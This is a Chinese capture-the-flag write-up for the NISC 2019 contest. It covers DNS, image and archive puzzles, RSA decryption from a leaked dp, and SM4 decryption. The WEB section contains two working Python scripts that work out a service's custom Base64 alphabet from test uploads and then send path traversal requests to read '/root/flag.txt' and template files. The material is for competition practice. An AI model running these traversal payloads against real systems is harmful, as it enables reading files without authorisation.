比赛时间:8月15日9:30-8月15日19:00
比赛网站:https://race.ichunqiu.com/nisc2019
MISC
签到题
-
题目描述
- 解题步骤
dig 命令主要用来从 DNS 域名服务器查询主机地址信息。
dig txt gamectf.com
gamectf.com. 600 IN TXT "flag{welcome_TXT}"
七代目
- 题目描述
- 解题步骤
- 修复文件头GIF8
- 查看每一帧的时间:
- 序号为6的帧只有1,保存下来切换一下通道:
亚萨西
- 题目描述
- 解题步骤
- 下载后用 WinRAR 打开,提示是损坏的 zip 文件
使用 7-Zip 或者 Bandizip 打开压缩包,提示需要输入密码
- winhex打开,发现可疑密码字符
得到密码是loli,解压得到图片
- 用 WinHex 打开图片,发现其中有 Ook! 编码,在线解码得到 flag
24word
- 题目描述
- 解题步骤
- 解压得到图片,进行社会主义核心价值观解码得到:
CodeValues
- binwalk看下图片发现压缩包,修改后缀为zip,密码CodeValues解码得到图片
- 扫描二维码得到flag
Crypto
dp
- 题目描述
- 解题步骤
import gmpy2
import libnum
# RSA public exponent.
e = 65537
# RSA modulus; the solve loop further down factors it as n = p * q.
n = 9637571466652899741848142654451413405801976834328667418509217149503238513830870985353918314633160277580591819016181785300521866901536670666234046521697590230079161867282389124998093526637796571100147052430445089605759722456767679930869250538932528092292071024877213105462554819256136145385237821098127348787416199401770954567019811050508888349297579329222552491826770225583983899834347983888473219771888063393354348613119521862989609112706536794212028369088219375364362615622092005578099889045473175051574207130932430162265994221914833343534531743589037146933738549770365029230545884239551015472122598634133661853901
# Leaked value given by the challenge. The solve loop treats it as the CRT
# exponent d mod (p - 1): it looks for i with (dp*e - 1) / i + 1 dividing n.
dp = 81339405704902517676022188908547543689627829453799865550091494842725439570571310071337729038516525539158092247771184675844795891671744082925462138427070614848951224652874430072917346702280925974595608822751382808802457160317381440319175601623719969138918927272712366710634393379149593082774688540571485214097
# Ciphertext; decrypted at the end with pow(c, d, n).
c = 5971372776574706905158546698157178098706187597204981662036310534369575915776950962893790809274833462545672702278129839887482283641996814437707885716134279091994238891294614019371247451378504745748882207694219990495603397913371579808848136183106703158532870472345648247817132700604598385677497138485776569096958910782582696229046024695529762572289705021673895852985396416704278321332667281973074372362761992335826576550161390158761314769544548809326036026461123102509831887999493584436939086255411387879202594399181211724444617225689922628790388129032022982596393215038044861544602046137258904612792518629229736324827
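def n2s(n):
    """Convert a non-negative integer to its big-endian byte string.

    The previous form relied on ``hex(n)[2:]`` and ``str.decode('hex')``.
    On Python 2, ``hex()`` of a long ends in ``L``, which breaks the hex
    decode, and the ``hex`` string codec does not exist on Python 3.
    ``%x`` formatting and ``binascii.unhexlify`` avoid both problems.

    Args:
        n: integer to convert (a plain int/long or a gmpy2 ``mpz``).

    Returns:
        The bytes whose big-endian value is ``n``; ``0`` gives one zero byte.
    """
    import binascii  # local import: the file's import block does not provide it

    digits = '%x' % int(n)  # int() normalises mpz values before formatting
    if len(digits) % 2:
        digits = '0' + digits  # unhexlify needs an even number of hex digits
    return binascii.unhexlify(digits)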
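# Recover p from the leaked CRT exponent dp.
# Since e*dp = 1 (mod p-1), e*dp - 1 = k*(p-1) for some k with 1 <= k < e,
# so trying every k up to e must hit the real p.
# Key-handling takeaway: dp (and dq) are private-key material; disclosing
# either one is enough to factor n.
edp_minus_1 = dp * e - 1  # loop-invariant, computed once
for i in range(1, e + 1):
    if edp_minus_1 % i != 0:
        continue
    # // keeps exact integer arithmetic (a bare / would yield a float on Python 3).
    p = edp_minus_1 // i + 1
    if n % p != 0:
        continue
    q = n // p
    phi = (p - 1) * (q - 1)
    d = gmpy2.invert(e, phi)  # already reduced modulo phi
    print(n2s(pow(c, d, n)))
    break  # n is factored; stop at the first factor found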
参考资料
https://zhuanlan.zhihu.com/p/43033684
- 解题步骤
sm4
- 题目描述
- 解题步骤
ECB模式 sm4解密库: https://github.com/yang3yen/pysm4
# -*- coding: utf-8 -*-
from pysm4 import encrypt, decrypt
import binascii
def dec_hex(str1):
    """Return the integer ``str1`` as hex text without the ``0x`` prefix.

    The result is left-padded with zeros to at least two characters, so a
    byte value always yields exactly two hex digits.
    """
    return hex(str1).replace("0x", "").zfill(2)
def hex_str(dic):
    """Join the two-digit hex form of every integer in ``dic`` behind a ``0x`` prefix."""
    return "0x" + "".join(dec_hex(value) for value in dic)
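if __name__ == '__main__':
    # 16-byte SM4 key and three 16-byte ciphertext blocks, given as byte values.
    key = [13, 204, 99, 177, 254, 41, 198, 163, 201, 226, 56, 214, 192, 194, 98, 104]
    c1 = [46, 48, 220, 156, 184, 218, 57, 13, 246, 91, 1, 63, 60, 67, 105, 64]
    c2 = [149, 240, 217, 77, 107, 49, 222, 61, 155, 225, 231, 196, 167, 121, 9, 16]
    c3 = [60, 182, 65, 101, 39, 253, 250, 224, 9, 204, 154, 122, 206, 43, 97, 59]
    # decrypt() is called with integers, so build them from the byte lists
    # instead of repeating the same values as hand-typed hex literals.
    key_num = int(hex_str(key), 16)
    # ECB has no chaining: every block is decrypted on its own with the same key.
    # '%032x' keeps leading zero nibbles and does not depend on the Python 2
    # 'L' suffix that hex(...)[2:-1] assumed, so each block always contributes
    # exactly 16 bytes to the joined result.
    c_str = ''.join(
        '%032x' % decrypt(int(hex_str(block), 16), key_num)
        for block in (c1, c2, c3)
    )
    print(c_str)
    print(binascii.a2b_hex(c_str))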
## SM4: flag{1caa96be-4266-4a8e-bd2c-ece977495497}
WEB
from urllib.parse import unquote,quote
import requests
import base64
import re
import string
import random
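# requests.sessions is a module, so calling it raises TypeError at start-up;
# the session class is requests.Session.
s = requests.Session()
# Base URL of the local challenge instance.
url = "http://127.0.0.1:8999"
# Learned substitution table, filled by make_dict(): standard Base64 character
# of an uploaded file name -> character found at the same position in the
# name the server returned.
new_dict = {}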
def get_b_name():
    """Upload ``test.jpg`` under a random name and return one known-plaintext pair.

    Returns:
        A tuple ``(origin, file_name)``. ``origin`` is the standard Base64
        text of the uploaded file name; ``file_name`` is the URL-decoded
        ``name`` value of the ``img.php`` link in the upload response
        (presumably the server's own encoding of the same name; verify
        against the challenge source).
    """
    # 50 distinct characters sampled from a-z, A-Z and 0-9.
    alphabet = string.ascii_letters + string.digits
    o_file_name = ''.join(random.sample(alphabet, 50)) + '.jpg'
    # Standard Base64 of the name as text; encode/decode default to UTF-8.
    origin = base64.b64encode(o_file_name.encode()).decode()
    with open('test.jpg', 'rb') as file:
        response = requests.post(url + "/upload.php",
                                 files={'file': (o_file_name, file)})
    # NOTE(review): re.search returns None when the link is missing, in which
    # case .group raises AttributeError.
    link = re.search(r'"img.php\?name=(.+?)"', response.text)
    file_name = unquote(link.group(1))
    return origin, file_name
def make_dict(origin, file_name):
    """Record in ``new_dict`` which ``file_name`` character sits at the position of each ``origin`` character.

    Later pairs overwrite earlier ones for the same ``origin`` character.
    """
    for position, plain_char in enumerate(origin):
        new_dict[plain_char] = file_name[position]
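if __name__ == '__main__':
    # Gather known-plaintext pairs; each upload adds more characters to the table.
    for _ in range(15):
        origin, file_name = get_b_name()
        make_dict(origin, file_name)
    # The path has to be *encoded* with standard Base64 before substitution.
    # The earlier b64decode call treated the path itself as Base64 text and
    # could not produce the characters new_dict is keyed on.
    flag = base64.b64encode(b'../../../../../root/flag.txt').decode()
    # Padding is passed through unchanged; every other character goes through
    # the learned table (KeyError means that character was never observed).
    res = [f if f == '=' else new_dict[f] for f in flag]
    payload = ''.join(res)
    # What this shows for the server side: a private Base64 alphabet is a plain
    # substitution that known uploads reveal, so it cannot stand in for
    # canonicalising the requested path and confining it to the image directory.
    print(quote(payload))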
import string
import requests as req
import base64
import urllib
·
# Recovered substitution between the service's Base64 alphabet and the standard
# one. As used below: key = character in the service's alphabet, value = the
# standard Base64 character it stands for (get() maps value -> key before
# sending, test() maps key -> value before decoding).
# NOTE(review): 'E' maps to a backslash, which is not a standard Base64
# character. Presumably that pair was never recovered; confirm.
z = {'0': 'Y', '2': 'P', '4': 'y', '6': 'e', '8': 'v', 'B': 'z', 'D': 'N', 'F': 't', 'H': 'x', 'J': 'U', 'L': 'X', 'N': 'F', 'P': 'V', 'R': 'q', 'T': 'a', 'V': 'l', 'X': 'm', 'Z': 'S', 'b': '4', 'd': 'B', 'f': 'h', 'h': '5', 'j': 'c', 'l': 'M', 'n': '9', 'p': 'w', 'r': '1', 't': '8', 'v': 'o', 'x': 'i', 'z': 'K',
'+': 'u', '/': 'A', '1': '0', '3': 'C', '5': 'T', '7': 'I', '9': 'k', 'A': 'b', 'C': 'J', 'G': '7', 'I': 'f', 'K': '6', 'M': 'Z', 'O': '2', 'Q': '+', 'S': 'd', 'U': '3', 'W': 'R', 'Y': 'W', 'a': 'L', 'c': 'r', 'e': 'g', 'g': 'n', 'i': 'E', 'k': 'j', 'm': 'G', 'o': 'H', 'q': 'Q', 's': 'p', 'u': 's', 'w': 'O', 'y': 'D', 'E': '\\'}
# Translation table key -> value (service alphabet to standard Base64).
# string.maketrans is the Python 2 API. Both arguments iterate z.keys(), so
# the character pairs stay aligned whatever order the dict yields.
b64table = string.maketrans(
''.join(z.keys()), ''.join([z[k] for k in z.keys()]))
# Reverse table value -> key (standard Base64 to service alphabet).
b64table2 = string.maketrans(
''.join([z[k] for k in z.keys()]), ''.join(z.keys()))
# Endpoint of the challenge instance; {} receives the URL-quoted, re-encoded name.
URL = 'http://3fc6a707471d4c83959773ac33db4ec348f07f0fa23e4e15.changame.ichunqiu.com/img.php?name={}'
def get(pl):
    """Encode ``pl`` with the recovered alphabet, request it through ``URL`` and print the response body."""
    std_b64 = base64.b64encode(pl)
    print "[+] Normal Base64 :", std_b64
    # str.translate converts each character through the 256-entry table
    # (Python 2 also accepts a second argument listing characters to delete).
    custom_b64 = std_b64.translate(b64table2)
    print "[+] Encode Base64 :", custom_b64
    res = req.get(URL.format(urllib.quote(custom_b64)))
    print(res.content)
def test(pl):
    """Map service-alphabet text ``pl`` back to standard Base64, decode it and print the result."""
    standard_b64 = pl.translate(b64table)
    print base64.b64decode(standard_b64)
if __name__ == '__main__':
    # Send each path through get(), in the same order as before.
    for path in ("../../../../../../proc/self/cwd/templates/upload.html",
                 "../../../../../../root/flag.txt"):
        get(path)
参考资料:爆破非默认Base64编码表
爆破Base64总结:把\x00\x10\x83\x10\x51\x87\x20\x92\x8B\x30\xD3\x8F\x41\x14\x93\x51\x55\x97\x61\x96\x9B\x71\xD7\x9F\x82\x18\xA3\x92\x59\xA7\xA2\x9A\xAB\xB2\xDB\xAF\xC3\x1C\xB3\xD3\x5D\xB7\xE3\x9E\xBB\xF3\xDF\xBF
将上面这 48 个字节作为输入交给目标的编码函数,输出就是它使用的 Base64 编码表:这些字节按 6 位一组依次是索引 0 到 63,所以输出的第 i 个字符就是编码表的第 i 项。